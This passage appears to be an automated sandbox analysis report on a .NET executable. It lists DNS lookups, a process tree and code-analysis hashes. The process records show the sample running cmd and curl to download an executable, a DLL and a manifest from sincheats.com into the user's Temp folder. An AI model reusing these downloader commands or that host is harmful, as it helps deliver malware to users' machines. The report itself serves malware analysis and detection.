    Jan 15, 2022 02:47:09.759537935 CET6529853192.168.2.48.8.8.8
    Jan 15, 2022 02:47:09.779298067 CET53652988.8.8.8192.168.2.4
    Jan 15, 2022 02:47:14.323132992 CET4971453192.168.2.48.8.8.8
    Jan 15, 2022 02:47:14.343588114 CET53497148.8.8.8192.168.2.4

    DNS Queries

    TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
    Jan 15, 2022 02:47:07.352165937 CET192.168.2.48.8.8.80x5950Standard query (0)sincheats.comA (IP address)IN (0x0001)
    Jan 15, 2022 02:47:09.759537935 CET192.168.2.48.8.8.80xbc7Standard query (0)sincheats.comA (IP address)IN (0x0001)
    Jan 15, 2022 02:47:14.323132992 CET192.168.2.48.8.8.80xf3c0Standard query (0)sincheats.comA (IP address)IN (0x0001)

    DNS Answers

    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
    Jan 15, 2022 02:47:07.382304907 CET8.8.8.8192.168.2.40x5950No error (0)sincheats.com217.21.76.148A (IP address)IN (0x0001)
    Jan 15, 2022 02:47:09.779298067 CET8.8.8.8192.168.2.40xbc7No error (0)sincheats.com217.21.76.148A (IP address)IN (0x0001)
    Jan 15, 2022 02:47:14.343588114 CET8.8.8.8192.168.2.40xf3c0No error (0)sincheats.com217.21.76.148A (IP address)IN (0x0001)

    Code Manipulations

    Statistics

    CPU Usage

    Click to jump to process

    Memory Usage

    Click to jump to process

    High Level Behavior Distribution

    Click to dive into process behavior distribution

    Behavior

    Click to jump to process

    System Behavior

    General

    Start time:02:47:04
    Start date:15/01/2022
    Path:C:\Users\user\Desktop\j82lgS5kgk.exe
    Wow64 process (32bit):false
    Commandline:"C:\Users\user\Desktop\j82lgS5kgk.exe"
    Imagebase:0x1f0000
    File size:10752 bytes
    MD5 hash:AE6CDC2BE9207880528E784FC54501ED
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:.Net C# or VB.NET
    Reputation:low

    General

    Start time:02:47:05
    Start date:15/01/2022
    Path:C:\Windows\System32\cmd.exe
    Wow64 process (32bit):false
    Commandline:cmd" /C curl -L https://sincheats.com/gas/PS4SAVEWIZARD.exe.manifest -o "C:\Users\user\AppData\Local\Temp\flexteam.exe.manifest
    Imagebase:0x7ff622070000
    File size:273920 bytes
    MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Reputation:high

    General

    Start time:02:47:06
    Start date:15/01/2022
    Path:C:\Windows\System32\conhost.exe
    Wow64 process (32bit):false
    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Imagebase:0x7ff724c50000
    File size:625664 bytes
    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Reputation:high

    General

    Start time:02:47:06
    Start date:15/01/2022
    Path:C:\Windows\System32\curl.exe
    Wow64 process (32bit):false
    Commandline:curl -L https://sincheats.com/gas/PS4SAVEWIZARD.exe.manifest -o "C:\Users\user\AppData\Local\Temp\flexteam.exe.manifest"
    Imagebase:0x7ff69f240000
    File size:424448 bytes
    MD5 hash:BDEBD2FC4927DA00EEA263AF9CF8F7ED
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Reputation:moderate

    General

    Start time:02:47:07
    Start date:15/01/2022
    Path:C:\Windows\System32\cmd.exe
    Wow64 process (32bit):false
    Commandline:cmd" /C curl -L https://sincheats.com/gas/PS4SAVEWIZARD.dll -o "C:\Users\user\AppData\Local\Temp\flexteam.dll
    Imagebase:0x7ff622070000
    File size:273920 bytes
    MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Reputation:high

    General

    Start time:02:47:08
    Start date:15/01/2022
    Path:C:\Windows\System32\conhost.exe
    Wow64 process (32bit):false
    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Imagebase:0x7ff724c50000
    File size:625664 bytes
    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Reputation:high

    General

    Start time:02:47:08
    Start date:15/01/2022
    Path:C:\Windows\System32\curl.exe
    Wow64 process (32bit):false
    Commandline:curl -L https://sincheats.com/gas/PS4SAVEWIZARD.dll -o "C:\Users\user\AppData\Local\Temp\flexteam.dll"
    Imagebase:0x7ff69f240000
    File size:424448 bytes
    MD5 hash:BDEBD2FC4927DA00EEA263AF9CF8F7ED
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Reputation:moderate

    General

    Start time:02:47:12
    Start date:15/01/2022
    Path:C:\Windows\System32\cmd.exe
    Wow64 process (32bit):false
    Commandline:cmd" /C curl -L https://sincheats.com/gas/PS4SAVEWIZARD.exe -o "C:\Users\user\AppData\Local\Temp\flexteam.exe
    Imagebase:0x7ff622070000
    File size:273920 bytes
    MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Reputation:high

    General

    Start time:02:47:13
    Start date:15/01/2022
    Path:C:\Windows\System32\conhost.exe
    Wow64 process (32bit):false
    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Imagebase:0x7ff724c50000
    File size:625664 bytes
    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Reputation:high

    General

    Start time:02:47:13
    Start date:15/01/2022
    Path:C:\Windows\System32\curl.exe
    Wow64 process (32bit):false
    Commandline:curl -L https://sincheats.com/gas/PS4SAVEWIZARD.exe -o "C:\Users\user\AppData\Local\Temp\flexteam.exe"
    Imagebase:0x7ff69f240000
    File size:424448 bytes
    MD5 hash:BDEBD2FC4927DA00EEA263AF9CF8F7ED
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Reputation:moderate

    General

    Start time:02:47:15
    Start date:15/01/2022
    Path:C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exe
    Wow64 process (32bit):false
    Commandline:dw20.exe -x -s 824
    Imagebase:0x10000000
    File size:43664 bytes
    MD5 hash:9B2D2AE232F2D0EFAEF9D5EB2509BE79
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Reputation:moderate

    Disassembly

    Code Analysis

    Reset < >

      Executed Functions

      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.686724094.00007FFA36340000.00000040.00000001.sdmp, Offset: 00007FFA36340000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_7ffa36340000_j82lgS5kgk.jbxd
      Similarity
      • API ID:
      • String ID: 81 6
      • API String ID: 0-1800155598
      • Opcode ID: 0d72726e0d0263d7e56975e8b58c26dc0e6c514e6d3d92b01e1eaa6dc75ca6ec
      • Instruction ID: 38e7cf9218d61eee15e149621eca3426175bd25dada66e3db51aac7457c7fb7d
      • Opcode Fuzzy Hash: 0d72726e0d0263d7e56975e8b58c26dc0e6c514e6d3d92b01e1eaa6dc75ca6ec
      • Instruction Fuzzy Hash: 56A15E71918A8D8FEB51DF28C895BE87BE1FF5A300F5581A5F84DC72A2CA34AC44CB51
      Uniqueness

      Uniqueness Score: -1.00%

      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.686724094.00007FFA36340000.00000040.00000001.sdmp, Offset: 00007FFA36340000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_7ffa36340000_j82lgS5kgk.jbxd
      Similarity
      • API ID:
      • String ID: 81 6
      • API String ID: 0-1800155598
      • Opcode ID: 876172e5cb2be3742322ac0188093f3da55495063d191b5dbb8f9ef8afaa8558
      • Instruction ID: 61944da0044a35f9c0e9d26430f9fe2d365870d734651ab58e3ba19da0219931
      • Opcode Fuzzy Hash: 876172e5cb2be3742322ac0188093f3da55495063d191b5dbb8f9ef8afaa8558
      • Instruction Fuzzy Hash: F0915F71918A8D8FEB51DF28C891BE97BE1FF5A300F5541A5F84DC72A2CA38AC44CB51
      Uniqueness

      Uniqueness Score: -1.00%

      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.686724094.00007FFA36340000.00000040.00000001.sdmp, Offset: 00007FFA36340000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_7ffa36340000_j82lgS5kgk.jbxd
      Similarity
      • API ID:
      • String ID: 81 6
      • API String ID: 0-1800155598
      • Opcode ID: 2f280340908e6bf4e8e52a36ebc9c7d22114dea85f00cf2277e7138eb0278ea0
      • Instruction ID: ee989bd4dab79ad4e9d92575fa5dae365320513d1eb2a896ae72a2fe82fdc634
      • Opcode Fuzzy Hash: 2f280340908e6bf4e8e52a36ebc9c7d22114dea85f00cf2277e7138eb0278ea0
      • Instruction Fuzzy Hash: 79914D71918B8D8FEB51DF28C891BE97BE1FF5A300F5541A6F84DC72A2CA34A844CB51
      Uniqueness

      Uniqueness Score: -1.00%

      Memory Dump Source
      • Source File: 00000000.00000002.686724094.00007FFA36340000.00000040.00000001.sdmp, Offset: 00007FFA36340000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_7ffa36340000_j82lgS5kgk.jbxd
      Similarity
      • API ID:
      • String ID:
      • API String ID:
      • Opcode ID: 6d8103c2ad34aa00f0b0f719c8b28673160a4c6696b42c25dc4140cd9ec6f682
      • Instruction ID: c13b8521d886a91134acb05a4775ef10c6b8494f99bdcba3c82d3c7d8fc761f6
      • Opcode Fuzzy Hash: 6d8103c2ad34aa00f0b0f719c8b28673160a4c6696b42c25dc4140cd9ec6f682
      • Instruction Fuzzy Hash: B251D19290EBC58FE35787744C22865BFB09E6320074E90EBC0C9CF2E3D9691C49D362
      Uniqueness

      Uniqueness Score: -1.00%

      Non-executed Functions